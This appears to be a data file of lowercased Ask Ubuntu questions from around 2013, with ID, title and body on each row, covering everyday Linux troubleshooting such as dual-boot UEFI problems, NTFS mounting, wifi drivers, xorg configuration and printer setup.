280517	how do you use `scanimage` to scan two sides of a document with an adf scanner ?	i have an scansnap ix500 and i 'm trying to figure out how to scan two sides of a document with it . obviously , i need to scan one side , flip the paper and scan the other side . but , i ca n't figure out how to get scanimage to hold up for one second while i flip and reload the paper .
280520	black screen , ca n't install	had a quick look around on here and around the web but i have n't been able to fix my problem yet . i recently bought a new laptop with windows 8 pre installed on it but i want to be able to dual boot with ubuntu . i turned secure boot off in uefi and i changed my load order so it would boot cd , usb then hdd . when i boot from my usb i get to a grub menu where i can choose to install or try ubuntu , no matter which one i select the screen goes black and stays that way . left it for over half an hour the first time and nothing happened . trying to install ubuntu 12.10 laptop is msi ge60 288au with intel core i7-3630qm *definately an issue with uefi , when i boot in legacy mode it works fine , except it does n't detect my already installed windows 8 !
280522	permission denied as root	i am trying to run chown on a directory and i get a permission denied . i have tried running sudo and also running the command as root . if root does n't have permission , how can i change the owner of this directory ? thanks
280523	how do put two operating systems on one dvd-r ?	how would i go about installing ubuntu 32 and 64 bit 12.10 on the same disk ? i would really like to do this if you could help . i 'm on ubuntu 12.10 64bit atm if that helps . edit : what i meant was installing the install cd for both 32 and 64bit on the same disk not the os itself . on a dvd-r here is wqhat i 'm looking for : ubuntu 32 and 64 bit installation disk on 1 dvd -r so when a person puts the dvd in and restarts computer they enter a menu and have to chose which os they want to install , the 32 bit os or the 64 bit os of ubuntu 12.10
280530	how do i mount a hibernated partition with windows 8 in ubuntu ?	i ca n't mount my other partition with windows 8 , i have ubuntu 12.10 amd64 : error mounting /dev/sda1 at /media/ricardo/003e8a7d3e8a6c0a : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda1 '' `` /media/ricardo/003e8a7d3e8a6c0a '' ' exited with non-zero exit status 14 : windows is hibernated , refused to mount . failed to mount '/dev/sda1 ' : operation not permitted the ntfs partition is hibernated . please resume and shutdown windows properly , or mount the volume read-only with the 'ro ' mount option , or mount the volume read-write with the 'remove_hiberfile ' mount option . for example type on the command line : mount -t ntfs-3g -o remove_hiberfile /dev/sda1 /media/ricardo/003e8a7d3e8a6c0a
280532	throwing an error if a file does n't exist in ubuntu installer preseed commands	i am working on a custom ubuntu installer image , and i 'm in a bit over my head . we have a custom seed file which is running this command : d-i preseed/early_command string /cdrom/snare/update_v5.sh within that script file i have added a check that throws an error if it can not find a file on the existing system : if [ ! -f /target/path/to/file.gz ] ; then logger custom-partition error `` file not found , upgrade aborted ! '' logger custom-partition error `` please run the upgrade preparation script first . '' exit 1 fi when the check fails it throws a mostly useless error message and provides the option to continue on with the installation process . how can i make it throw a useful error message and block further installation steps ?
280536	seahorse empty ( have no keys/folders )	passwords & keys windows is empty . containing nothing . this causing constant dialog box calling me to enter password which not exist . anyone had same issue and know solution ? ralph
280538	refresh desktop icons	i have used mount -- bind to mirror my windows desktop folder to ubuntu . i have set it up to mount on boot but the desktop does not refresh the icons so i have to logout and log back in to make the icons appear . thanks in advance . update : i am running 12.10 if that changes anything . also i have tried killall nautilus .
280539	how can i backup media from a tablet to my ubuntu desktop ?	i have ubuntu 12.10 and a samsung galaxy tab 2 7.0 how can i use my desktop to back up my tablet ? i tried to call samsung support earlier , but they wanted $ 200 for their tech support !
280542	ubuntu completly ignores my xorg.d settings	i 've talked about my laptop 's touchpad elsewhere ... given its touchpad position and configuration you trigger the secondary and terciary click while typing as they are bound to the left top and left bottom corner* . i know how to fix this ( ** , *** ) , i have this : # example xorg.conf.d snippet that assigns the touchpad driver # to all touchpads . see xorg.conf.d ( 5 ) for more information on # inputclass . # do not edit this file , your distribution will likely overwrite # it when updating . copy ( and rename ) this file into # /etc/x11/xorg.conf.d first . # additional options may be added in the form of # option `` optionname '' `` value '' # section `` inputclass '' identifier `` touchpad catchall '' driver `` synaptics '' matchistouchpad `` on '' # this option is recommend on all linux systems using evdev , but can not be # enabled by default . see the following link for details : # http : //who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html matchdevicepath `` /dev/input/event* '' endsection section `` inputclass '' identifier `` touchpad ignore duplicates '' matchistouchpad `` on '' matchos `` linux '' matchdevicepath `` /dev/input/mouse* '' option `` ltcornerbutton '' `` 0 '' option `` lbcornerbutton '' `` 0 '' option `` ignore '' `` on '' endsection # this option enables the bottom right corner to be a right button on # non-synaptics clickpads . # this option is only interpreted by clickpads . section `` inputclass '' identifier `` default clickpad buttons '' in my /usr/share/x11/xorg.conf.d/50-synaptics.conf file . and it should work as setting those options with synclient but ubuntu decides for some reason that i knows better and i ca n't override the setting . why ? and , most importantly , how can i fix this ? also : this question is a possible duplicate of x11 ignoring options in configuration for input device but that solution is ugly . i wo n't do that , but should i post this as a comment ? * : they will be triggered at the worst time , like , all the time . enough to drive me mad ... ** : where is the x.org config file ? how do i configure x there ? *** http : //www.x.org/archive/x11r7.5/doc/man/man4/synaptics.4.html
280544	keep saved wifi spots when reinstalling ubuntu	when i upgrade to 13.04 at the end of this month , i want to preserve all the wifi passwords that i have saved from my workplace/friends houses/etc . but i do n't want to do an 'upgrade ' or anything like that , i like to do a fresh install on a reformatted hard drive . how can i preserve all the saved wifi hotspots ?
280546	asus q400a fn keys not working	i am having problems enabling the screen brightness keys in ubuntu 12.04 lts . i was able to find a instructions to enable the function keys for the backlit keyboard but i can not find instructions for the fn keys that control the screen brightness ; and yes , i do know how to adjust the brightness from the power menu .
280551	`` burn as file or burn content '' which should i choose ?	i 've downloaded ubuntu 12.04 image file and then i want to burn to a cd but when i tried to write the disc i getting notication `` burn as file or burn content '' . which should i choose ?
280553	fstab error on boot	i want a 2nd hard drive to mount at boot i have this in /etc/fstab uuid=7726e231-4373-451d-8588-930becd772c6 /home/server/common ext4 0 1 when starting i get an error , did i misconfigure the line ?
280555	dynamic switching between ethernet and wifi	at my university , or specifically in my dorm , ethernet speed is a sluggish 10 mb/s . wifi , on the other hand , is as much as 100 mb/s if you have a good antenna - i do not , so speeds range from 50 mb/s to nothing . is there a way to configure my networking such that i use wireless until its speed is less than that of the ethernet , and automatically switch over ? uname -a linux jack-r4 3.5.0-27-generic # 46~precise1-ubuntu smp tue mar 26 19:33:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux
280556	why older version of package repositories of ubuntu do n't get updated ?	suppose my ubuntu version is natty and i want to install the latest nodejs using apt-get . however , the latest nodejs is only available in the package repository of quantal . ( see http : //packages.ubuntu.com/search ? keywords=nodejs & searchon=names & section=all ) , which force me to either update my operating system to quantal or build the latest nodejs from its source tarball . the building script of nodejs on natty has no difference from that on quantal . why the maintainers of ubuntu package repositories do n't even try to keep package repositories of natty up with quantal ?
280558	`libqapt-runtime ' contains empty filename error while updating	whenever i try to update ubuntu 12.10 , it always gets interrupted by this error : files list file for package `libqapt-runtime ' contains empty filename i have tried to install with apt-get as well and that gets interrupted by the same error .
280561	copy file path utility ( gui ) required	i use ubuntu 12.04 . i am in need of a copy file path utility in ubuntu . i need to often copy the below for my tasks : full filename full file path just as an example only , in my office pc ( running win-xp ) , i use a small tool from bullzip . link to website . i am mentioning it here only for giving an example . but for my ubuntu , i would be glad if someone guided me to a similar gui based tool or an equivalent script in nautilus . i searched a lot on the internet and i found out tools to copy files and folders but not file-paths . thanks again ! ! ! !
280564	drive permissions denied over ssh ?	i am having issued with drive permissions on ubuntu 12.10 . the server to which i 'm connecting over ssh has two hdds . ubuntu runs off 'drive 1 ' , and the server app runs 'drive 2 ' . when i formatted drive 2 to ext4 , i had to manually add the permissions for my user account to be able to read/write to it . this process went smoothly , and , when directly using the computer ( in gui mode ) , i can access the drive without any issues . however , when i log in to the machine remotely via ssh , under the same user account , when i try to access drive 2 ( actually called linuxdatadrive ) ( using cd command ) , i get the message : bash : cd : linuxdatadrive/ : permission denied why is this ? i logged into ssh using the same ( and only ) user account , and on that same account , using the machine itself , i can access the drive without issue . any suggestions ? thanks in advance ! over ssh : id : uid=1000 ( karl ) gid=1000 ( karl ) groups=1000 ( karl ) ,4 ( adm ) ,24 ( cdrom ) ,27 ( sudo ) ,30 ( dip ) ,46 ( plugdev ) ,107 ( lpadmin ) ,124 ( sambashare ) pwd : /media/karl ls -ld linuxdatadrive : drwx -- -- -- 2 root root 4096 apr 11 22:54 linuxdatadrive â df : drwx -- -- -- 2 root root 4096 apr 11 22:54 linuxdatadrive karl @ karlsminecraftserver : /media/karl $ df filesystem 1k-blocks used available use % mounted on /dev/sdb5 49060680 6194752 40373720 14 % / udev 4016332 4 4016328 1 % /dev tmpfs 1611896 808 1611088 1 % /run none 5120 0 5120 0 % /run/lock none 4029732 0 4029732 0 % /run/shm none 102400 4 102396 1 % /run/user karl is the username karlsminecraftserver is the machine name linuxdatadrive is the actual name of the 'drive2 ' referenced in the question .
280566	my headphones mute alsamixer when i plug them in , hp dv6 12.04	whenever i plug any type of headphones into one of the audio out connectors on my hp dv6 , alsa mutes them , muting the `` speaker '' setting ( see attached image ) . this also happened in fedora , so it 's a problem with alsa and my computer . does anyone know anything that would help ? note , i do n't have enough reputation for images . here 's a link : image thank you so much if you can help !
280573	making wireless work in ubuntu12.10	i installed ubuntu12.10 on a win8 lappy . but the wireless does not seem to work . here are some of the details that you might be interested in . so as of now my machine is in a state where i ca n't connect to the internet , however i have another machine that connects to internet . please let me know , what is wrong with my laptops wireless settings and how do i install drivers if any . below is some data that you might be interested in . sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:01:00.2 logical name : eth0 version : 0a serial : 6c:3b : e5:7c:86 : f6 size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl8411-1_0.0.3 06/18/12 latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:2000 ( size=256 ) memory : c0404000-c0404fff memory : c0400000-c0403fff *-network unclaimed description : network controller product : ralink corp. vendor : ralink corp. physical id : 0 bus info : pci @ 0000:02:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : c0510000-c051ffff lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 01:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 0a ) 02:00.0 network controller : ralink corp. device 3290 02:00.1 bluetooth : ralink corp. device 3298 rfkill list all 0 : hp-wifi : wireless lan soft blocked : no hard blocked : no
280575	ubuntu 12.04 , download flash videos from nowvideo website ?	first of all i 'm apology to ask this repeated question . actually i 'm new to ubuntu , previously i 'm using windows in that using internet download manager i 'm download all the videos file and one more feature is when we are watch any video it should be enable and ask download this video . particularly asking this question , now a days most of the site videos running on flash player ( .flv formate ) so hear their is no way for getting site video id when we are copy the running video url then html file only downloded . so please help me download videos from nowvideo like website videos . is their any software like internet download manager to ask running video download option ?
280576	my user id and password is correct : can not log in to ubuntu 12.04	i have a dual boot in machine with windows7 and ubuntu . while i was installing ubuntu , it prompted me for a name and a password 2 times . i gave a user name and put my password 2 times and wrote it down in a place so that i do not forget . when i reboot my system it shows 2 operating systems . when i go to windows 7 it works perfectly . when i go to ubuntu it shows login and guest login . when i go to login , enter my user name and the password that i have written while installing , it shows invalid username or password . i have uninstalled and reinstalled 3 times and each time same thing happens . i am new to ubuntu . please let me know if anyone can help .
280577	kde does n't change the whole theme	the kde themes arenât changing right . when i change a theme , it only changes the decorations and the panels and widgets . the rest of the theme remains same . how can i change the grey area ( idk what its called ) ?
280578	change office file associations to ms office 2010	i have freshly installed ubuntu 12.10 64 bit on my hp pavilion g6 laptop . post installation i installed ms office 2010 through wine . by default all office files viz . xls/x , doc/x , ppt/x are associated with libreoffice which i would like to change to ms office . here is an excerpt from the file /usr/share/applications/defaults.list application/csv=libreoffice-calc.desktop application/excel=libreoffice-calc.desktop application/msexcel=libreoffice-calc.desktop application/msword=libreoffice-writer.desktop please guide .
280579	linux network options	i am new to linux ubuntu os . previously i used windows 7 . now i am facing lot of problems with this os . i could n't able to access the network system 's shared files . in windows i used the tools > > map network option to mapping . i made several search in google , but nothing is clear and understandable . in system settings > > network > > i could n't map any thing . please refer the question : `` what network mapping tools are available ? '' in linux what to use ? please help .
280580	how to solve `` /lib/modules/3.5.0-17-generic/build : no such file or directory '' error	i installed ubuntu 12.10 64 bit on my desktop hp elite 7500 , but i have no ethernet connection . i have an atheros ethernet card is . i have downloaded drivers to install . i extracted files . when i try to install it , it gives : /lib/modules/3.5.0-17-generic/build : no such file or directory what is the problem . i googled found some sites where some people tell to install kernel headers , but if i have no network and an internet so how can i download and install it . another interesting thing is that , when i try to install driver from live-cd it installed and i connected to the network . then what is the problem , when i try to do this from installed ubuntu ?
280584	external hdd automatically get back after safe remove	this is weird ! i use udisks -- detach /dev/sdb for safely remove my hard disk . after 2 sec hard drive automatically mounted and nautilus window pops up . this is output of udevadm monitor -- udev . udev [ 67744.241650 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/bsg/7:0:0:0 ( bsg ) udev [ 67744.242272 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/scsi_device/7:0:0:0 ( scsi_device ) udev [ 67744.242308 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/scsi_disk/7:0:0:0 ( scsi_disk ) udev [ 67744.243365 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/scsi_generic/sg2 ( scsi_generic ) udev [ 67744.243399 ] remove /devices/virtual/bdi/8:16 ( bdi ) udev [ 67744.243545 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/block/sdb/sdb1 ( block ) udev [ 67744.248425 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:1/bsg/7:0:0:1 ( bsg ) udev [ 67744.248520 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0/block/sdb ( block ) udev [ 67744.248566 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:0 ( scsi ) udev [ 67744.248596 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:1/enclosure/7:0:0:1 ( enclosure ) udev [ 67744.248625 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:1/scsi_device/7:0:0:1 ( scsi_device ) udev [ 67744.248660 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:1/scsi_generic/sg3 ( scsi_generic ) udev [ 67744.248689 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/scsi_host/host7 ( scsi_host ) udev [ 67744.252526 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0/7:0:0:1 ( scsi ) udev [ 67744.252563 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7/target7:0:0 ( scsi ) udev [ 67744.252594 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host7 ( scsi ) udev [ 67744.317378 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0 ( usb ) udev [ 67744.339889 ] remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 ( usb ) udev [ 67751.203840 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3 ( usb ) udev [ 67751.205913 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0 ( usb ) udev [ 67751.207203 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8 ( scsi ) udev [ 67751.208287 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/scsi_host/host8 ( scsi_host ) udev [ 67752.183035 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0 ( scsi ) udev [ 67752.183988 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:0 ( scsi ) udev [ 67752.184022 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:1 ( scsi ) udev [ 67752.184944 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:0/scsi_device/8:0:0:0 ( scsi_device ) udev [ 67752.184959 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:1/scsi_device/8:0:0:1 ( scsi_device ) udev [ 67752.185348 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:0/scsi_generic/sg2 ( scsi_generic ) udev [ 67752.185365 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:1/scsi_generic/sg3 ( scsi_generic ) udev [ 67752.185381 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:0/bsg/8:0:0:0 ( bsg ) udev [ 67752.185392 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1.3:1.0/host8/target8:0:0/8:0:0:0/scsi_disk/8:0:0:0 ( scsi_disk ) udev [ 67755.138374 ] add /devices/virtual/bdi/8:16 ( bdi ) udev [ 67755.140810 ] add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.3/2-1 . as you see , hdd detach from system and after that come back to system again . kernel add this device after i removed it . any idea appreciated .
280586	screen and webcam recording with nvidia-bumblebee	i wish to record my desktop or my game session in linux with webcam if possible . for windows i use obs , but until it comes out , i need to find other means . i looked at recordmydesktop , and kazam ut it has no web cam capture . vokoscreen has webcam , but it has problems with audio - the last 2 % or so of the audio is cut of from the video , and the recorder has issues using bumblebee at all . so war what i have recorded was lagfest at best . i havea dell inspirion 5720 with intel hd 4000 , nvidia gt630m . any recomendation for recording game seesion with webcam , and making smooth video ?
280590	need help using a japanese keyboard ( not ime ) in ubuntu 12.10	i am using an old x60 that i bought from japan . naturally , it has a japanese keyboard . when installing 12.10 , i chose the closest keyboard layout i could find : japanese ( oadg 109a ) . but somehow my keyboard does n't respond to the japanese switch key so i 'm stuck with typing in english only . i have installed the japanese language and japanese anthy ( ibus ) . those work fine . what i really want is to type in japanese via the hiragana printed characters on the keyboard . this is the first time i am using a japanese keyboard , so any help would be appreciated .
280592	using `` try ubuntu '' option and ca n't get out of it	i used a pendrive ( universal usb installer ) to install ubuntu on my pc . here are the instructions that i followed : http : //www.pendrivelinux.com/using-a-portable-virtualbox-to-run-linux-from-usb/ ( the pendrive is the virtual usb device ) now , every time i boot the ubuntu main page appear and i am presented with three options : try ubuntu install ubuntu on harddrive boot from the first harddisk i know if choose install ubuntu on hard drive option , the window blow off . so for like 3 months i chose `` try ubuntu '' option . how can i get back to my previous window ? i know my window has been not yet wiped out ... please give me advice .
280593	how to uninstall intel linux graphics installer and revert to default drivers	recently intel released their opensource driver tool ( https : //01.org/linuxgraphics/downloads/2013/intel-linux-graphics-installer ) which auto-selects the right drivers for your intel chipset ( in my case , i was using the i915 driver ) . because i started using steam on linux to play some older games i thought i would use the intel 'official ' drivers to ensure i get the best performance . unfortunately , since installing the drivers , the computer fan is very loud and the battery does n't last that long ( it 's cut battery life in half ) . on top of that , there 's no noticeable difference when playing games on steam . my question is , how do i revert back to the original drivers ? if i run the intel graphic driver installer i get the following output in the terminal ( not in the gui ) so i assume i will somehow need to run apt-get with some type of downgrade flag ( i 'm not sure how to do that ) against these packages . install : [ i915-3.4-3.2-dkms libdrm-nouveau2 ] upgrade : [ libcairo2 libcairo-gobject2 libcairo-script-interpreter2 libdrm2 libdrm-intel1 libkms1 libva1 libva-x11-1 libva-glx1 libva-tpi1 libva-egl1 vainfo libxatracker1 libgbm1 libegl1-mesa libegl1-mesa-drivers libopenvg1-mesa libgles1-mesa libgles2-mesa libglapi-mesa libgl1-mesa-glx libgl1-mesa-dri libgl1-mesa-dri-experimental libosmesa6 libglu1-mesa i965-va-driver libva-intel-vaapi-driver xserver-xorg-video-intel libwayland0 ] when i look at the install logs though , it seems there 's much more than that . any assistance on this would be most appreciated .
280594	how to remove software installed from source , where `` make '' was not used ?	i download this package and following the instructions on the website i untared its package in /usr/local/share and used ./install command to install it . now i need to remove it . is there anyway to do that ? if it needs them i still have the installation files . this is the website
280603	is it safe to uninstall thunderbird ?	actually i do n't want it , i also do n't want to install any updates of thunderbird . so , whenever new updates available to download , i will manually deselect it from downloading . thanks
280604	assign hotkeys to paste predefined text	i am looking for a program that runs on ubuntu 12.04+ x86_64 which allows pasting pre-defined text based on hotkey combinations . for instance : ctrl+alt+v+u : pastes my username ctrl+alt+v+e : pastes my email any suggestions ?
280605	remove device from ubuntu one through api	how to create api request to remove a device from ubuntu one ? i need to delete current access token from server through api . thanks
280618	error when running script ( 'compress-pdf ' ) in thunar custom actions	i want to add the script 'compress-pdf ' to thunar custom actions . the script is the one posted in this answer , made to resize pdfs . it is based on zenity . it was made for nautilus , but , as stated there , it 'does not depend on any custom nautilus variables and can be used with pretty much any file manager out there that supports custom menu actions . ' i have added the script into a text file , made it executable , and added the path to it into thunar custom actions with the name 'resize pdf ' . but , when right-clicking the selected pdf and running 'resize pdf ' , i get this error : why is that and how to fix it ? ( maybe the zenity script needs indeed adjustment to work in thunar custom actions ? )
280626	printer setting changes to generic printer	os=ubuntu 12.04 64bit lo=3.5 i am running ubuntu on client through ltsp . on the server , i have added 2 network printer through cups and shared between my fat clients . i am able to print successfully , but sometime in middle the default printer changes to generic printer : i tried this /usr/lib/libreoffice/program/spadmin and set default printer but again in middle it goes to generic printer . how do i make any one printer default system wide ? output : /home/ $ user/.config/libreoffice/3/user/psprint/psprint.conf [ __global_printer_defaults__ ] disablecups=false
280630	how can i correctly rebind an additional space to another key ?	i 've bought a split ergonomic keyboard , and wish to bind the left spacebar to space . i 'm attempting to use xmodmap , which binds it fine when pressed alone , except it does not correctly recognise ctrl+space . here is what i 've tried . to determine the correct bindings i should use , i did $ xmodmap -pke | grep space keycode 65 = space nosymbol space from xev , the right space is indeed 65 , and the left is 103 . hence , i ran $ xmodmap -e 'keycode 103 = space nosymbol space $ xmodmap -pke | grep space keycode 65 = space nosymbol space keycode 103 = space nosymbol space now , the left spacebar sends space , but ctrl+space does n't work ( i use this to trigger guake ) . oddly enough , if i bind space nosymbol space to keycode 10 ( the 1 key ) , then ctrl+space works for 1 , but not for the right spacebar now ! perhaps the lowest number is the only one that 's working ? fwiw , i 've also tried adding another / bound to an additional key , and ctrl+/ seems to work fine for both ( at least in rubymine ) . an addendum : if i check the space keystroke ( without modifier ) with xev , i get slightly different results for the working space as opposed to the partially-working space ( s ) . if the working space is keycode foo , then i get an additional line for the partially-working spaces . xkeysymtokeycode returns keycode : foo
280631	is it possible to recuperate a file overwritten by ubuntu one ?	i had an .odt file which was synced via ubuntu one . i made changes on the file on my ubuntu computer . to check whether the file was synced i opened it on my windows computer . it was not synced , but ubuntu one thought it was and because i opened the file on windows it took that file to be the newer one , thus overwriting the original file on ubuntu ... you get the point i guess . bottom line : i lost my changes to the file . is there any way to revert back to the file before and get my original back ? is there any advanced setup tool for this available ?
280639	pes 2013 via wine on ubuntu 12.10	i 've finally got the game to work on ubuntu . the thing is it 's slow . this game is the only thing keeping me from totally moving from windows 8 to ubuntu 12.10 i would like to get rid of windows 8 by making this game a bit faster , just a bit . i 've tried video memory size and changed it to 512 mb , my real vram . still slow . is there anyway that i can speed the game up a bit ?
280642	upstart script that depends on init.d scripts ?	i have an upstart script to start a custom nodejs app . the app depends on couchdb and elasticsearch . couchdb and elasticsearch provide init.d scripts for starting/stopping them . is it possible to tell my upstart script that couchdb and elasticsearch are dependencies ? i tried this in my upstart script but it does not seem to work : start on ( started couchdb and started elasticsearch ) thanks !
280644	install brother mfc 7360n for beginners	iim running ubuntu and want to install my brother mfc 7360n printer scanner fax . i 've tried to just plug in the usb cable , but the only two drivers ubuntu shows do n't work . one of them does n't react at all and the other prints only blank pages . i 've found this page , but i have no idea what cups are or any of that other stuff . a little help would be great . thanks .
280646	while installing ubuntu i used replace windows with ubuntu option . did it delete my private data ?	i had 3 partitions : local disk c : with windows installed d : and e : with my data . while installing ubuntu , i used : replace windows with ubuntu option have i lost my data in d : and e : also ? if not , where are they ? i am not able to find them . please help , i am new to ubuntu .
280651	can x.org load two different drivers ? ( triple-head setup with intel and nvidia card )	we want to set up a 3 screens with an onboard intel graphics adapter and an nvidia card . both cards are recognized in lspci 01:00.0 vga compatible controller : nvidia corporation gt218 [ geforce 210 ] ( rev a2 ) 00:02.0 display controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) and bascially work : if i switch to the console , i see output on the intel card , x is only running on the nvidia card . but when i type xrandr | grep conn i get only one connected port : dvi-i-0 disconnected ( normal left inverted right x axis y axis ) vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 connected 1920x1200+0+0 ( normal left inverted right x axis y axis ) 518mm x 324mm hdmi-0 disconnected ( normal left inverted right x axis y axis ) i am on ubuntu 12.10 ( and xfce ) and installed the proprietary nvidia driver . i was assuming that x maybe has a problem to autodetect both cards , so i thought the following xorg.conf could help : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' screen 1 `` screen1 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce 210 '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection section `` monitor '' identifier `` monitor1 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device1 '' driver `` intel '' vendorname `` intel '' boardname `` internal intel graphics '' endsection section `` screen '' identifier `` screen1 '' device `` device1 '' monitor `` monitor1 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection but it is still not working . is this generally possible to use two different drivers in x ? is it necessary to create an xorg.conf manually then ? ( because ubuntu 12.10 normally works without the xorg.conf ) are there any errors in my xorg.conf ?
280656	possible to have `` yes '' as a keyboard shortcut ?	many times a day do i have to type yes , so is it possible to have it as a shortcut on f12 ? i have see gnee and xmacro but they seam very complicated to use and over powered for my purpose .
280658	ups beeping on mouse scroll or other events	i have this hardware problem , my ups battery beeps a lot when using ubuntu ( not so much on windows ) , so i am thinking that it may be a interrupt problem or a power surge of some sort . the strange thing is that is happening even when i do a mouse scroll , or play a video on full screen or other strange seemingly unrelated events . any suggestions ? i can post some configs if you think they can be useful .
